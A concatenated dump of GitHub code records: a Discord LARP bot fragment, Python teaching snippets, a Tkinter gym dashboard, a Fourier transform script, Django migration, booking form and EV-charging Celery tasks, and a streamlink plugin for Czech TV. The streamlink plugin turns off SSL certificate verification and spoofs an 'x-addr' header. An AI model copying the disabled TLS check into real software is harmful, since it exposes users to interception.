Je příkaz napsaný správně?')\n\n return\n\n await message.channel.send(f\"Tenhle příkaz neznám.\")\n return\n\n if not started:\n return\n\n # dále ignoruj kanály, které nejsou nějakého z teamů\n if message.channel.id not in data:\n return\n\n # změna stavu podle toho, co účastník napsal\n if await update(message.channel.id, message.content):\n # odpověď, pokud se změna povedla\n await write(message.channel.id)\n\nprint(f'Logging in.')\nclient.run('secret token pro bota')\n","repo_name":"ksp/LARP","sub_path":"larp.py","file_name":"larp.py","file_ext":"py","file_size_in_byte":45701,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24063774881","text":"# def add(x,y):\n# return x + y\n#\n# print(add(5,6))\n# print(add(\"Sohel \",\"khan\").upper())\n\n\n\n\n\nclass Person:\n def __init__(self,name,age,money):\n self.name = name\n self.age = age\n self.money = money\n\n def __add__(self, other):\n return self.age + other.age\n\n\nsakib = Person(\"Sakib Al Hasan\",34,400)\nrakib = Person(\"Rakib Chowdhury\", 40,700)\n\n# my_dict = sakib.__dict__\n# print(my_dict)\n\nprint(sakib + rakib)","repo_name":"arafat-yasin-2413/PYTHON_and_OOP","sub_path":"WEEK -2/OOP from Batch 1/Module 9/1_dunder_methods.py","file_name":"1_dunder_methods.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34613957648","text":"import asyncio\nfrom tkinter import messagebox\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nfrom datetime import datetime\nfrom tkcalendar import Calendar\nimport io\n# from trainee.settings_window import SettingsWindow\n# from trainee.workouts import WorkoutsWindow\nfrom trainee.wordings_list import *\nimport commands\n\n\nclass TraineeDashboard:\n def __init__(self, wind, traineeID, traineeName):\n self.wind = wind\n self.traineeID = traineeID\n self.traineeName = traineeName\n self.root = Toplevel()\n self.root.configure(bg='lightgray')\n self.root.attributes('-fullscreen', True)\n\n # Header Label Container\n Label(self.root, width=1847, height=144, bg='#C2CCF2').place(x=0, y=0)\n\n # Gym logo\n gymPic = Image.open(\"assets/gym.jpg\")\n # Resize image\n gymPic.thumbnail((235, 141))\n test = ImageTk.PhotoImage(gymPic)\n # Positioning the image\n label1 = Label(self.root, image=test)\n label1.image = test\n label1.place(x=0, y=0)\n\n # Daystar logo\n daystarPic = Image.open(\"assets/daystar.png\")\n # Resize image\n daystarPic.thumbnail((235, 141))\n test2 = ImageTk.PhotoImage(daystarPic)\n # Positioning the image\n label2 = Label(self.root, image=test2)\n label2.image = test2\n label2.place(x=142, y=0)\n\n # User welcome\n self.var = StringVar()\n self.var.set(f'Hello {self.traineeName},\\nWelcome back.')\n Label(self.root, textvariable=self.var, bg='#C2CCF2', height=4, width=50, pady=6, font='times 20',\n justify=LEFT).place(x=374, y=0)\n\n # Timedate info\n self.lab1 = Label(self.root, bg='#C2CCF2', height=4, pady=6, font='times 20')\n self.lab1.place(x=1600, y=0)\n\n # Log out function\n self.logoutPic = Image.open('assets/logout.png')\n self.logoutPic.thumbnail((137, 141))\n self.test3 = ImageTk.PhotoImage(self.logoutPic)\n # Button(self.root, text='LOG OUT', image=self.test3, command=self.logout).place(x=0, y=938)\n\n # Left Label Container\n Label(self.root, width=143, height=899, bg='#FBF6F6').place(x=0, y=142)\n\n # Settings button\n # Button(self.root, text='SETTINGS', width=14, padx=13, height=6, 
command=self.launch_settings).place(x=0, y=142)\n\n # Progress button\n Button(self.root, text='PROGRESS', width=14, padx=13, height=6, command='').place(x=0, y=255)\n\n # Training Container\n Label(self.root, width=1082, height=883, bg='#FFF3C7').place(x=142, y=142)\n\n # # Heading\n # Label(self.root, text='TODAY\\'S TRAINING', bg='#FBF6F6', width=90, padx=4, height=2, font='times 20').place(x=\n\n def run(self):\n self.wind.mainloop()\n\nif __name__ == '__main__':\n root = Tk()\n dashboard = TraineeDashboard(root, 'trainee_id', 'trainee_name')\n dashboard.run()\n\n\n# from trainee_dashboard import TraineeDashboard\n#\n# # create an instance of TraineeDashboard class\n# trainee_dashboard = TraineeDashboard(wind, traineeID, traineeName)\n#\n# # call the show_dashboard() method to display the dashboard\n# trainee_dashboard.show_dashboard()","repo_name":"micckey/Gym_App","sub_path":"oopsdash.py","file_name":"oopsdash.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43612690909","text":"'''\r\nDiscrete Fourier Transform for any function along with\r\nvisualization with matplotlib.\r\n'''\r\n\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport numpy as np\r\n\r\ndelta_t = 0.001\r\nfunction_range = np.arange(-6 * np.pi, 6 * np.pi + delta_t, delta_t)\r\n\r\nt = [t for t in function_range]\r\nf = [(-x if (x < -2) else np.sin(x)) if (x < 0) else x for x in function_range]\r\n\r\ndef get_FT(t, f, w):\r\n f_cos_wt = 0\r\n f_sin_wt = 0\r\n\r\n for t_i in range(1, len(t)):\r\n # F cos(wt) dt\r\n f_cos_wt += f[t_i] * np.cos(w * t[t_i]) * (t[t_i] - t[t_i - 1])\r\n # F sin(wt) dt\r\n f_sin_wt += f[t_i] * np.sin(w * t[t_i]) * (t[t_i] - t[t_i - 1])\r\n \r\n return (f_cos_wt, f_sin_wt)\r\n\r\ndef get_FT_Real(t, f, w):\r\n return get_FT(t, f, w)[0]\r\n\r\ndef get_FT_Imag(t, f, w):\r\n return get_FT(t, f, w)[1]\r\n\r\n\r\ndef generate_FT(t, f, w_start, w_end):\r\n w = np.linspace(w_start, w_end, 1000)\r\n DFT_Real = get_FT_Real(t, f, w)\r\n DFT_Imag = get_FT_Imag(t, f, w)\r\n return (w, DFT_Real, DFT_Imag)\r\n\r\nw, DFT_Real, DFT_Imag = generate_FT(t, f, -3, 3)\r\n\r\nplt.rcParams[\"figure.figsize\"] = (20, 10)\r\nfig = plt.figure()\r\nax = plt.subplot(2, 2, 1)\r\n\r\nax.plot(t, f)\r\nax.set_xlim(xmin=min(function_range)*2, xmax=max(function_range)*2)\r\nax.axhline(0, color=\"red\", linestyle=\"--\")\r\nax.axvline(0, color=\"red\", linestyle=\"--\")\r\nax.set_title(\"Function\")\r\n\r\nax2 = plt.subplot(2, 2, 2)\r\nax2.set_title(\"Fourier Transform\")\r\nax2.plot(w, DFT_Real, color=\"green\", label=\"Real\")\r\nax2.plot(w, DFT_Imag, color=\"blue\", label=\"Imag\")\r\nax2.axhline(0, color=\"red\", linestyle=\"--\")\r\nax2.axvline(0, color=\"red\", linestyle=\"--\")\r\nax2.legend()\r\n\r\nax3 = plt.subplot(2, 2, 3, projection=\"3d\")\r\nax3.plot(w, DFT_Real, DFT_Imag)\r\n\r\nplt.show()\r\n","repo_name":"RelativisticMechanic/Interesting-Python-Scripts","sub_path":"discrete-fourier-transform.py","file_name":"discrete-fourier-transform.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2975347804","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auction', '0027_auto_20161228_0925'),\n ]\n\n operations = [\n migrations.AddField(\n 
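# Added note (not from the original migration): on_delete=SET_NULL is only\n            # valid together with null=True, which this field sets below; blank=True\n            # additionally allows forms to leave the relation empty.\n            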
model_name='action',\n name='item',\n field=models.ForeignKey(blank=True, to='auction.Auction', on_delete=django.db.models.deletion.SET_NULL, null=True),\n ),\n ]\n","repo_name":"kwarodom/auction-statistic","sub_path":"auction/migrations/0028_action_item.py","file_name":"0028_action_item.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25010695224","text":"\"\"\"\nPlugin for Czech TV (Ceska televize).\n\nFollowing channels are working:\n * CT1 - https://www.ceskatelevize.cz/porady/ct1/\n * CT2 - https://www.ceskatelevize.cz/porady/ct2/\n * CT24 - https://ct24.ceskatelevize.cz/#live\n * CT sport - https://www.ceskatelevize.cz/sport/zive-vysilani/\n * CT Decko - https://decko.ceskatelevize.cz/zive\n * CT Art - https://www.ceskatelevize.cz/porady/art/\n\nAdditionally, videos from iVysilani archive should work as well.\n\"\"\"\nimport json\nimport logging\nimport re\nfrom html import unescape as html_unescape\nfrom urllib.parse import quote\n\nfrom streamlink.exceptions import PluginError\nfrom streamlink.plugin import Plugin\nfrom streamlink.plugin.api import useragents, validate\nfrom streamlink.stream import DASHStream, HLSStream\n\nlog = logging.getLogger(__name__)\n\n\nclass Ceskatelevize(Plugin):\n\n ajax_url = 'https://www.ceskatelevize.cz/ivysilani/ajax/get-client-playlist'\n _url_re = re.compile(\n r'http(s)?://([^.]*.)?ceskatelevize.cz'\n )\n _player_re = re.compile(\n r'ivysilani/embed/iFramePlayer[^\"]+'\n )\n _hash_re = re.compile(\n r'hash:\"([0-9a-z]+)\"'\n )\n _playlist_info_re = re.compile(\n r'{\"type\":\"([a-z]+)\",\"id\":\"([0-9]+)\"'\n )\n _playlist_url_schema = validate.Schema({\n validate.optional(\"streamingProtocol\"): validate.text,\n \"url\": validate.any(\n validate.url(),\n \"Error\",\n \"error_region\"\n )\n })\n _playlist_schema = validate.Schema({\n \"playlist\": [{\n validate.optional(\"type\"): validate.text,\n \"streamUrls\": {\n \"main\": validate.url(),\n }\n }]\n })\n\n @classmethod\n def can_handle_url(cls, url):\n return cls._url_re.match(url)\n\n def _get_streams(self):\n self.session.http.headers.update({'User-Agent': useragents.IPAD})\n self.session.http.verify = False\n log.warning('SSL certificate verification is disabled.')\n # fetch requested url and find playlist info\n response = self.session.http.get(self.url)\n info = self._find_playlist_info(response)\n\n if not info:\n # do next try with new API\n def _fallback_api(*args, **kwargs):\n self.api2 = CeskatelevizeAPI2(self.session, self.url, *args, **kwargs)\n return self.api2._get_streams()\n\n # playlist info not found, let's try to find player url\n player_url = self._find_player_url(response)\n if not player_url:\n log.debug('Cannot find playlist info or player url, do next try with new API')\n return _fallback_api(res=response)\n\n # get player url and try to find playlist info in it\n response = self.session.http.get(player_url)\n info = self._find_playlist_info(response)\n if not info:\n log.debug('Cannot find playlist info in the player url, do next try with new API')\n return _fallback_api()\n\n log.trace('{0!r}'.format(info))\n\n data = {\n 'playlist[0][type]': info['type'],\n 'playlist[0][id]': info['id'],\n 'requestUrl': '/ivysilani/embed/iFramePlayer.php',\n 'requestSource': 'iVysilani',\n 'type': 'html'\n }\n headers = {\n 'x-addr': '127.0.0.1',\n }\n\n # fetch playlist url\n response = self.session.http.post(\n self.ajax_url,\n data=data,\n headers=headers\n )\n json_data = 
self.session.http.json(response, schema=self._playlist_url_schema)\n log.trace('{0!r}'.format(json_data))\n\n if json_data['url'] in ['Error', 'error_region']:\n log.error('This stream is not available')\n return\n\n # fetch playlist\n response = self.session.http.post(json_data['url'])\n json_data = self.session.http.json(response, schema=self._playlist_schema)\n log.trace('{0!r}'.format(json_data))\n playlist = json_data['playlist'][0]['streamUrls']['main']\n return HLSStream.parse_variant_playlist(self.session, playlist)\n\n @classmethod\n def _find_playlist_info(cls, response):\n \"\"\"\n Finds playlist info (type, id) in HTTP response.\n\n :param response: Response object.\n :returns: Dictionary with type and id.\n \"\"\"\n values = {}\n matches = cls._playlist_info_re.search(response.text)\n if matches:\n values['type'] = matches.group(1)\n values['id'] = matches.group(2)\n\n return values\n\n @classmethod\n def _find_player_url(cls, response):\n \"\"\"\n Finds embedded player url in HTTP response.\n\n :param response: Response object.\n :returns: Player url (str).\n \"\"\"\n url = ''\n matches = cls._player_re.search(response.text)\n if matches:\n tmp_url = matches.group(0).replace('&', '&')\n if 'hash' not in tmp_url:\n # there's no hash in the URL, try to find it\n matches = cls._hash_re.search(response.text)\n if matches:\n url = tmp_url + '&hash=' + matches.group(1)\n else:\n url = tmp_url\n\n return 'http://ceskatelevize.cz/' + url\n\n\nclass CeskatelevizeAPI2:\n _player_api = 'https://playlist.ceskatelevize.cz/'\n _url_re = re.compile(r'http(s)?://([^.]*.)?ceskatelevize.cz')\n _playlist_info_re = re.compile(r'{\\s*\"type\":\\s*\"([a-z]+)\",\\s*\"id\":\\s*\"(\\w+)\"')\n _playlist_schema = validate.Schema({\n \"CODE\": validate.contains(\"OK\"),\n \"RESULT\": {\n \"playlist\": [{\n \"streamUrls\": {\n \"main\": validate.url(),\n }\n }]\n }\n })\n _ctcomp_re = re.compile(r'data-ctcomp=\"Video\"\\sdata-video-id=\"(?P[^\"]*)\"\\sdata-ctcomp-data=\"(?P[^\"]+)\">')\n _ctcomp_schema = validate.Schema(\n validate.text,\n validate.transform(_ctcomp_re.findall),\n validate.transform(lambda vl: [{\"video-id\": v[0], \"ctcomp-data\": json.loads(html_unescape(v[1]))} for v in vl])\n )\n _playlist_info_schema = validate.Schema({\n \"type\": validate.text,\n \"id\": validate.any(validate.text, int),\n \"key\": validate.text,\n \"date\": validate.text,\n \"requestSource\": validate.text,\n \"drm\": int,\n validate.optional(\"canBePlay\"): int,\n validate.optional(\"assetId\"): validate.text,\n \"quality\": validate.text,\n validate.optional(\"region\"): int\n })\n\n def __init__(self, session, url, res=None):\n self.session = session\n self.url = url\n self.response = res\n\n def _get_streams(self):\n if self.response is None:\n infos = self.session.http.get(self.url, schema=self._ctcomp_schema)\n else:\n infos = self.session.http.json(self.response, schema=self._ctcomp_schema)\n if not infos:\n # playlist infos not found\n raise PluginError('Cannot find playlist infos!')\n\n vod_prio = len(infos) == 2\n for info in infos:\n try:\n pl = info['ctcomp-data']['source']['playlist'][0]\n except KeyError:\n raise PluginError('Cannot find playlist info!')\n\n pl = self._playlist_info_schema.validate(pl)\n if vod_prio and pl['type'] != 'VOD':\n continue\n\n log.trace('{0!r}'.format(info))\n if pl['type'] == 'LIVE':\n data = {\n \"contentType\": \"live\",\n \"items\": [{\n \"id\": pl[\"id\"],\n \"assetId\": pl[\"assetId\"],\n \"key\": pl[\"key\"],\n \"playerType\": \"dash\",\n \"date\": pl[\"date\"],\n 
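# Added note: field names follow the e-charge playlist API payload; the\n                        # LIVE item carries \"assetId\" but omits \"canBePlay\" and \"region\",\n                        # which the VOD branch below sends.\n                        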
\"requestSource\": pl[\"requestSource\"],\n \"drm\": pl[\"drm\"],\n \"quality\": pl[\"quality\"],\n }]\n }\n elif pl['type'] == 'VOD':\n data = {\n \"contentType\": \"vod\",\n \"items\": [{\n \"id\": pl[\"id\"],\n \"key\": pl[\"key\"],\n \"playerType\": \"dash\",\n \"date\": pl[\"date\"],\n \"requestSource\": pl[\"requestSource\"],\n \"drm\": pl[\"drm\"],\n \"canBePlay\": pl[\"canBePlay\"],\n \"quality\": pl[\"quality\"],\n \"region\": pl[\"region\"]\n }]\n }\n\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n }\n\n data = json.dumps(data)\n response = self.session.http.post(\n self._player_api,\n data=\"data={}\".format(quote(data)),\n headers=headers\n )\n json_data = self.session.http.json(response, schema=self._playlist_schema)\n log.trace('{0!r}'.format(json_data))\n playlist = json_data['RESULT']['playlist'][0]['streamUrls']['main']\n yield from DASHStream.parse_manifest(self.session, playlist).items()\n\n\n__plugin__ = Ceskatelevize\n","repo_name":"Tup0lev/BiliBili_Global_Streaming_Projet_Katyusha","sub_path":"packages/streamlink/plugins/ceskatelevize.py","file_name":"ceskatelevize.py","file_ext":"py","file_size_in_byte":9275,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"31"} +{"seq_id":"10277812789","text":"#-*-coding:utf-8-*-\nfrom __future__ import absolute_import, unicode_literals\n\nimport json\nimport random\nfrom datetime import datetime, timedelta\nfrom time import sleep\nfrom celery import shared_task\nfrom chargingorder.models import Order\nfrom chargingstation import settings\nfrom django.db.models import Q, Max, Count, Sum, F, Min\n#\nfrom echargenet.models import ConnectorInfo, CheckChargeOrder, DisputeOrder\nfrom echargenet.utils import data_encode, get_hmac_md5, EchargeNet, data_decode, get_order_status, \\\n get_equipment_connector_status\nfrom stationmanager.models import ChargingGun\nfrom stationmanager.utils import connect_redis\n\n\n@shared_task\ndef update_pile_status_overtime():\n \"\"\"\n 超时处理\n 电桩状态上报超时,设置电桩状态为离线\n \"\"\"\n r = connect_redis()\n pile_status_dict = r.hgetall(settings.CHARING_PILE_STATUS) # pile_sn, send_time, overtime\n print('update_pile_status_overtime:', pile_status_dict)\n for k, v in pile_status_dict.items():\n pile_sn = k.decode(\"utf-8\")\n v = json.loads(v.decode(\"utf-8\"))\n send_time = v[\"send_time\"]\n over_time = v[\"overtime\"]\n sendTime = datetime.strptime(send_time, \"%Y-%m-%d %H:%M:%S\")\n delta_time = (datetime.now() - sendTime).seconds\n if delta_time > over_time:\n # 更新pile状态 4为离线状态\n ChargingGun.objects.filter(charg_pile__pile_sn=pile_sn).update(work_status=9)\n # 判断充电状态的结束充电\n\n\n@shared_task\ndef notification_start_charge_result(start_charge_seq, connector_id):\n \"\"\"\n 接口名称:notification_start_charge_result\n 使用要求:充电桩实际启动成功或失败后,应立即将启动结果��息同步推送至市级平台e充网,时\n 间应控制在启动命令下发后50秒内\n \"\"\"\n Data = {\n \"StartChargeSeq\": start_charge_seq,\n \"ConnectorID\": connector_id,\n }\n # Ret = 0\n # Msg = \"\"\n try:\n sleep(5)\n order = Order.objects.get(start_charge_seq=start_charge_seq)\n if order.begin_time:\n Data[\"StartTime\"] = order.begin_time.strftime(\"%Y-%m-%d %H:%M:%S\")\n else:\n Data[\"StartTime\"] = datetime.now().strptime(\"%Y-%m-%d %H:%M:%S\")\n\n Data[\"StartChargeSeqStat\"] = get_order_status(order.charg_status_id)\n\n except Order.DoesNotExist as ex:\n Data[\"StartChargeSeqStat\"] = 5\n Data[\"StartTime\"] = datetime.now().strptime(\"%Y-%m-%d %H:%M:%S\")\n # Msg = \"Order Not Exists\"\n\n # encrypt_data = data_encode(**Data) 
# 数据加密\n # # 数据签名, 用Ret+Msg+Data生成返回签名\n # sig_data = \"{0}{1}{2}\".format(str(Ret), Msg, encrypt_data)\n # ret_sig = get_hmac_md5(settings.SIGSECRET, sig_data)\n # result = {\n # \"Ret\": Ret,\n # \"Msg\": Msg,\n # \"Data\": encrypt_data,\n # \"Sig\": ret_sig,\n # }\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n status = echarge.notification_start_charge_result(**Data)\n if status > 0:\n print(\"推送启动充电结果失败!\", status)\n else:\n print(\"推送启动充电结果成功!\", status)\n\n\n# 定时任务\n@shared_task\ndef notification_equip_charge_status():\n \"\"\"\n 推送充电状态\n 使用要求:充电桩开始充电后,均须每间隔50秒向市级平台e充网推送一次充电状态数据\n :return:\n \"\"\"\n orders = Order.objects.filter(Q(status=None) | Q(status=0) | Q(status=1), start_charge_seq__isnull=False)\n\n for order in orders:\n result = {}\n gun_num = order.gun_num\n ConnectorID = '{0}{1}'.format(order.charg_pile.pile_sn, gun_num)\n gun = ChargingGun.objects.get(charg_pile=order.charg_pile, gun_num=gun_num)\n result[\"ConnectorID\"] = ConnectorID\n result[\"StartChargeSeq\"] = order.start_charge_seq\n\n result[\"StartChargeSeqStat\"] = get_order_status(order.charg_status_id)\n result[\"ConnectorStatus\"] = get_equipment_connector_status(gun.work_status, order.charg_status_id)\n\n # A 相电流 A 相电压\n if order.begin_time is None or order.end_time is None:\n continue\n\n result[\"CurrentA\"] = 0\n result[\"VoltageA\"] = 0\n result[\"Soc\"] = order.end_soc\n result[\"StartTime\"] = order.begin_time.strftime(\"%Y-%m-%d %H:%M:%S\")\n result[\"EndTime\"] = order.end_time.strftime(\"%Y-%m-%d %H:%M:%S\")\n result[\"TotalPower\"] = order.get_total_reading()\n result[\"TotalMoney\"] = order.consum_money\n\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n status = echarge.notification_equip_charge_status(**result)\n if status > 0:\n print(\"推送充电状态失败!\", status)\n else:\n print(\"推送充电状态成功!\", status)\n\n\n@shared_task\ndef notification_stop_charge_result(start_charge_seq, connector_id):\n \"\"\"\n 接口名称:notification_stop_charge_result\n 当充电桩实际停止充电后须立即推送结果信息到市级平台e充网,从充电桩收到停止命\n 令到向市级平台e充网推送充电停止结果时间间隔控制在50秒内\n :return:\n \"\"\"\n Data = {\n \"StartChargeSeq\": start_charge_seq,\n \"ConnectorID\": connector_id,\n }\n # Ret = 0\n # Msg = \"\"\n try:\n sleep(5)\n order = Order.objects.get(start_charge_seq=start_charge_seq)\n\n Data[\"StartChargeSeqStat\"] = get_order_status(order.charg_status_id)\n\n except Order.DoesNotExist as ex:\n Data[\"StartChargeSeqStat\"] = 5\n # Msg = \"Order Not Exists\"\n\n # encrypt_data = data_encode(**Data) # 数据加密\n # # 数据签名, 用Ret+Msg+Data生成返回签名\n # sig_data = \"{0}{1}{2}\".format(str(Ret), Msg, encrypt_data)\n # ret_sig = get_hmac_md5(settings.SIGSECRET, sig_data)\n # result = {\n # \"Ret\": Ret,\n # \"Msg\": Msg,\n # \"Data\": encrypt_data,\n # \"Sig\": ret_sig,\n # }\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n status = echarge.notification_stop_charge_result(**Data)\n if status > 0:\n print(\"推送停止充电结果失败!\", status)\n else:\n print(\"推送停止充电结果成功!\", status)\n\n connector_status = echarge.notification_station_status(connector_id, 0) # 设置为空闲状态\n if status > 0:\n print(\"设备状态变化推送失败!\", connector_status)\n else:\n print(\"设备状态变化推送成功!\", connector_status)\n\n\n@shared_task\ndef notification_charge_order_info_for_bonus():\n \"\"\"\n 推送充电订单信息(运营考核奖励)\n 使用要求:自充电桩停止充电并生成订单后,订单须在150秒内上报到市级平台e充网,如上报失败\n 须按照以下频率推送订单信息(150/300/…./1800/3600/….,单位秒)\n \"\"\"\n orders = Order.objects.filter(Q(report_result__isnull=True) | Q(report_result__gt=0), start_charge_seq__isnull=False, status=2)\n result ={}\n 
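# Added notes (sketch, not executed): the docstring's retry ladder\n    # (150/300/.../1800/3600 s) could be derived from a hypothetical per-order\n    # attempt counter, e.g. delay = min(150 * (attempts + 1), 1800) during the\n    # first hour and 3600 afterwards; the loop below only enforces a ~150 s gap\n    # via report_time. Also note that 'result' above is created once and reused\n    # for every order, so keys such as StopReason can leak between iterations\n    # unless reset per order.\n    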
# Ret = 0\n # Msg = \"\"\n for order in orders:\n if order.begin_time is None or order.end_time is None:\n continue\n\n if order.report_time is not None:\n if (datetime.now() - order.report_time).seconds < 145:\n continue\n\n try:\n gun = ChargingGun.objects.get(charg_pile=order.charg_pile, gun_num=order.gun_num)\n except ChargingGun.DoesNotExist as ex:\n gun = None\n\n ConnectorID = '{}{}'.format(order.charg_pile.pile_sn, order.gun_num)\n result[\"StartChargeSeq\"] = order.start_charge_seq\n result[\"ConnectorID\"] = ConnectorID\n result[\"StartTime\"] = order.begin_time.strftime(\"%Y-%m-%d %H:%M:%S\")\n result[\"EndTime\"] = order.end_time.strftime(\"%Y-%m-%d %H:%M:%S\")\n result[\"ChargeModel\"] = 0\n result[\"TotalPower\"] = str(order.get_total_reading())\n result[\"TotalMoney\"] = str(order.consum_money)\n result[\"UserName\"] = order.name\n result[\"StationID\"] = str(order.charg_pile.station.id)\n result[\"EquipmentID\"] = order.charg_pile.pile_sn\n result[\"ConnectorPower\"] = gun.power if gun is not None else 0\n result[\"ChargeLast\"] = order.total_seconds()\n result[\"MeterValueStart\"] = str(order.begin_reading)\n result[\"MeterValueEnd\"] = str(order.end_reading)\n if order.charg_status_id == 91:\n result[\"StopReason\"] = 0 # 用户手动停止充电\n elif order.charg_status_id in [95, 96]:\n result[\"StopReason\"] = 3 # 充电机设备故障\n elif order.charg_status_id in [98, 92]:\n result[\"StopReason\"] = 4 # 连接器断开\n elif order.charg_status_id in [93, 94, 97]:\n result[\"StopReason\"] = 1 # 客户归属地运营商平台停止充\n\n # encrypt_data = data_encode(**result) # 数据加密\n # # 数据签名, 用Ret+Msg+Data生成返回签名\n # sig_data = \"{0}{1}{2}\".format(str(Ret), Msg, encrypt_data)\n # ret_sig = get_hmac_md5(settings.SIGSECRET, sig_data)\n # result = {\n # \"Ret\": Ret,\n # \"Msg\": Msg,\n # \"Data\": encrypt_data,\n # \"Sig\": ret_sig,\n # }\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n ret_data = echarge.notification_charge_order_info_for_bonus(**result)\n\n if \"Ret\" in ret_data and ret_data[\"Ret\"] == 0:\n # 解密\n ret_crypt_data = ret_data[\"Data\"]\n ret_decrypt_data = data_decode(ret_crypt_data)\n # 获取到code值\n dict_decrpt_data = json.loads(ret_decrypt_data)\n print(dict_decrpt_data[\"StartChargeSeq\"])\n ConfirmResult = dict_decrpt_data[\"ConfirmResult\"]\n else:\n ConfirmResult = 99\n\n order.report_result = ConfirmResult\n order.report_time = datetime.now()\n order.save()\n if ConfirmResult > 0:\n print(\"推送充电订单信息失败!\", ConfirmResult)\n else:\n print(\"推送充电订单信息成功!\", ConfirmResult)\n\n\n# 定时任务\n@shared_task\ndef notification_connector_status():\n \"\"\"定时推送设备接口状态\"\"\"\n connectors = ConnectorInfo.objects.all()\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n for connector in connectors:\n status = echarge.notification_station_status(connector.ConnectorID, connector.Status)\n if status > 0:\n print(\"设备状态变化推送失败:{},{}\".format(connector.ConnectorID, status))\n else:\n print(\"设备状态变化推送成功:{},{}\".format(connector.ConnectorID, status))\n\n\n# 定时任务\n@shared_task\ndef check_charge_orders():\n \"\"\"\n 接口名称:check_charge_orders\n 使用要求:每天0点到3点之间推送前一天市级平台e充网启动的所有订单信息\n 1、是否是经过上报的订单\n 2、开始时间还是结束时间(跨天问题)\n \"\"\"\n prev_date = datetime.now().date() - timedelta(days=1)\n print(\"当前时间:\", prev_date)\n order_totals = Order.objects.filter(end_time__date=prev_date, start_charge_seq__isnull=False, status=2, charg_pile__is_subsidy=1)\\\n .aggregate(\n start_time=Min(\"end_time\"), end_time=Max(\"end_time\"), order_count=Count(\"out_trade_no\"),\n total_power=Sum(F(\"end_reading\") - 
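\n                   # added note: per-order energy = end_reading - begin_reading,\n                   # aggregated over the previous day's completed orders on\n                   # subsidised piles (see the filter above)\n                   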
F(\"begin_reading\")), total_money=Sum(\"consum_money\")\n )\n print(order_totals)\n check_orders = {}\n check_order_seq = '{0}{1}{2}'.format(settings.OPERATORID, datetime.now().strftime('%Y%m%d%H%M%S'), random.randint(10000, 100000))\n check_orders[\"CheckOrderSeq\"] = check_order_seq\n check_orders[\"StartTime\"] = order_totals[\"start_time\"].strftime(\"%Y-%m-%d %H:%M:%S\")\n check_orders[\"EndTime\"] = order_totals[\"end_time\"].strftime(\"%Y-%m-%d %H:%M:%S\")\n check_orders[\"OrderCount\"] = order_totals[\"order_count\"]\n check_orders[\"TotalOrderPower\"] = float(order_totals[\"total_power\"])\n check_orders[\"TotalOrderMoney\"] = float(order_totals[\"total_money\"])\n\n orders = Order.objects.filter(end_time__date=prev_date, start_charge_seq__isnull=False,\n status=2, charg_pile__is_subsidy=1)\n charge_orders = []\n for order in orders:\n d_order = {}\n d_order[\"StartChargeSeq\"] = order.start_charge_seq\n d_order[\"TotalPower\"] = float(order.get_total_reading())\n d_order[\"TotalMoney\"] = float(order.consum_money)\n charge_orders.append(d_order)\n\n check_orders[\"ChargeOrders\"] = charge_orders\n print(json.dumps(check_orders))\n\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n ret_data = echarge.check_charge_orders(**check_orders)\n if \"Ret\" in ret_data and ret_data[\"Ret\"] == 0:\n # 解密\n ret_crypt_data = ret_data[\"Data\"]\n ret_decrypt_data = data_decode(ret_crypt_data)\n # 获取到code值\n dict_decrpt_data = json.loads(ret_decrypt_data)\n check_order = {\n \"CheckOrderSeq\": dict_decrpt_data[\"CheckOrderSeq\"],\n \"StartTime\": datetime.strptime(dict_decrpt_data[\"StartTime\"], '%Y-%m-%d %H:%M:%S'),\n \"EndTime\": datetime.strptime(dict_decrpt_data[\"EndTime\"], '%Y-%m-%d %H:%M:%S'),\n \"TotalDisputeOrder\": dict_decrpt_data[\"TotalDisputeOrder\"],\n \"TotalDisputePower\": dict_decrpt_data[\"TotalDisputePower\"],\n \"TotalDisputeMoney\": dict_decrpt_data[\"TotalDisputeMoney\"],\n }\n CheckChargeOrder.objects.create(**check_order)\n DisputeOrders = dict_decrpt_data[\"DisputeOrders\"]\n for disOrder in DisputeOrders:\n DisputeOrder.objects.create(**disOrder)\n else:\n print(ret_data[\"Msg\"])\n\n\n","repo_name":"malx927/chargingstation","sub_path":"stationmanager/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":13714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72220182487","text":"\"\"\"\nBooking App - form\n---------------------\nForm for booking app\n\n\"\"\"\n# Imports\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nfrom django import forms\nfrom django.forms.widgets import CheckboxSelectMultiple\nfrom .models import Booking, TeeTime\nfrom django.contrib import messages\nfrom datetime import date, datetime, time\nfrom django.utils import timezone\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\nclass TeeTimeForm(forms.Form):\n\n \"\"\"\n Form that enables users to enter their booking criteria and return\n available teetimes\n 